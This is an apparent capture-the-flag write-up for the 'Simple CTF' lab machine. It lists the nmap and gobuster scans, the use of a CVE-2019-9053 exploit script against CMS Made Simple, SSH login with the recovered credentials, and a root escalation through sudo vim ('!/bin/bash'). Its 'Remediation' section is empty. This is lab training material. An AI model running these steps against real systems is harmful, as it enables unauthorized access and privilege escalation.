[Linux] Simple CTF
Enumeration
sudo nmap 10.10.56.128
sudo nmap -A -p 21,80 10.10.56.128
HTTP
Robots.txt
First we look at the website. The nmap scan showed the presence of a robot.txt file. We should look at what is indide.
We get these informations:
web pages:
/openemr-5_0_1_3, /name: mike
Both web pages cannot be accessed.
Directory listing
gobuster dir -u http://10.10.56.128 -w /usr/share/wordlists/dirb/common.txt 
gobuster dir -u http://10.10.56.128/simple -w /usr/share/wordlists/dirb/common.txt
We see that the website is build on a CMS called CMS Made Simple.
FTP
We can't find anythinf interesting on the ftp server. The server enter in a passive mode when we want to access list its ressources. We don't try anything further.
Exploitation
CMS made simple is vulnrable to CVE-2019-9053. We use the following exploit to abuse the service: CVE-2019-9053.
python3 exploit.py -u http://10.10.56.128/simple/ -c -w /usr/share/dirb/wordlists/others/best110.txt
We got:
a username: mitch
an email: admin@admin.com
a password: secret
We get access to the admin administration page on the website.
SSH
We stayed at this stage until we did another enumeration phase on the remaing port (2222). Bingo! an SSH service runs at this port:
sudo nmap -A -p 2222 10.10.56.128
We can try the credentials on the ssh service.
ssh -p 2222 mitch@10.10.56.128
Privilege Escalation
sudo -l 
We can explore GTFOBins to see how we can elevate our privilege on the system as we are allowed to run vim command as root.
sudo vim ~/user.txt
ESCHAP
:!/bin/bash
Remediation
Last updated